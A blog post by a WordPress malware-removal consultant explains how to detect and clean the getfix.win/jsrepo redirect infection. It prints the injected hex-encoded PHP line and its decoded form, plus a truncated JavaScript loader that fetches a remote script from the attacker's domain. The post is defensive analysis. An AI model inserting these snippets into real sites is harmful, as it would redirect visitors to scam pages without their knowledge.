MD Pabel

Website Redirecting to getfix[.]win: How to Detect, Remove, and Prevent This Malware

Written by

MD Pabel

in

, , ,

Quick Answer: What is the Getfix.win Hack?

The getfix.win/jsrepo malware is a JavaScript injection that redirects your visitors to spam sites. It hides in your theme’s functions.php file using “Hex Encoding” to look like random numbers.

How to Remove It:

  1. Locate: Open functions.php and look for a line starting with $url = "\x68\x74...".
  2. Delete: Remove that specific line of code.
  3. Scan: Run a Wordfence scan to find any other hidden backdoors.
  4. Update: Update all plugins immediately, as this hack usually enters via outdated software.

If your website keeps redirecting to hxxps://getfix.win/jsrepo, it has been hit by a specific type of WordPress malware. This hack is currently targeting thousands of sites, messing up SEO, and scaring away visitors.

I recently worked on a client’s site and found this exact malware hiding in their theme’s functions.php file. In this guide, I will show you exactly what this code looks like, how to decode it, and how to clean it up permanently.

What Is the Getfix.win Redirect Malware?

The getfix.win/jsrepo redirect hack sneaks code into your WordPress files. It makes visitors’ browsers fetch a malicious script from getfix.win, which then redirects them to junk sites, gambling ads, or tech support scams.

The Sneaky Part: This malware often targets visitors, not admins. If you are logged in as an Administrator, you might not see the redirect at all. This tricks you into thinking your site is fine while your customers are being sent to spam sites.

Breaking Down the Malicious Code (Developer Analysis)

The malware uses clever tricks to hide itself. I decoded the exact script I found on my client’s site so you know what to look for.

1. The PHP Injection (functions.php)

In the functions.php file (see screenshot below), the hacker injects a line of code that looks like this:

$url = "\x68\x74\x74\x70\x73\x3a\x2f\x2f\x67\x65\x74\x66\x69\x78\x2e\x77\x69\x6e\x2f\x6a\x73\x72\x65\x70\x6f?rnd=" . time() . '_' . rand(1000, 9999);

Obfuscated PHP code injected into WordPress functions.php file causing getfix.win redirect

This is called Hex Encoding. The hacker converts text into hexadecimal numbers (e.g., \x68 = h) so security scanners don’t see the word “getfix.win”.

Decoded, that line actually says:

$url = "https://getfix.win/jsrepo?rnd=[Time]_[RandomNumber]";

Why the random numbers?
The code adds ?rnd=1730700000_1234 to the end of the URL. This trick forces the browser to download a fresh copy of the virus every time, bypassing any caching plugins or firewalls you might have.

2. The JavaScript Injection

Once the PHP code runs, it injects a JavaScript snippet into your site’s header:

Malicious JavaScript injection code found in WordPress header source

<script>
;!function t(){var e="https://getfix.win/jsrepo?rnd="+Math.random()+"&ts="+Date.now();
// ... code that fetches the virus ...
</script>

This script connects to the hacker’s server and downloads the actual “Payload”—the code that redirects your users.

How to Remove the Malware (Step-by-Step)

Removing this specific infection is straightforward if you follow these steps carefully.

Step 1: Check your functions.php file

  1. Log into your hosting via FTP or File Manager.
  2. Navigate to wp-content/themes/your-active-theme/.
  3. Open the functions.php file.
  4. Look for the code starting with $url = "\x68... or similar hex characters.
  5. Delete that entire code block.

Note: Sometimes this code is also hidden in header.php or footer.php. Check those too.

Step 2: Run a Deep Scan

Deleting the line stops the redirect, but you need to find the “Backdoor” the hacker used to get in. Install Wordfence or MalCare and run a full scan to find hidden files.

Step 3: Update Everything

This specific malware usually spreads through outdated plugins or “nulled” (pirated) themes. Update all your plugins immediately. If you are using a nulled theme, delete it—it is the source of the infection.

Prevention: How to Stop It From Coming Back

Once you are clean, lock the door:

  • Change Passwords: Change your WP Admin, FTP, and Database passwords immediately.
  • Disable File Editing: Add define('DISALLOW_FILE_EDIT', true); to your wp-config.php file. This stops hackers from editing your functions.php file from the dashboard.
  • Install a Firewall: Use the free version of Wordfence or Cloudflare to block bad bots.

Need Help?

If you are uncomfortable editing PHP files or if the redirect keeps coming back after you delete it, you might have a deeper infection (like a hidden database backdoor).

I offer a professional WordPress Malware Removal Service. I will manually clean your files, remove the backdoors, and secure your site against future attacks.

👉 Click here to get your site fixed today.

Comments

Leave a Reply

Your email address will not be published. Required fields are marked *

More posts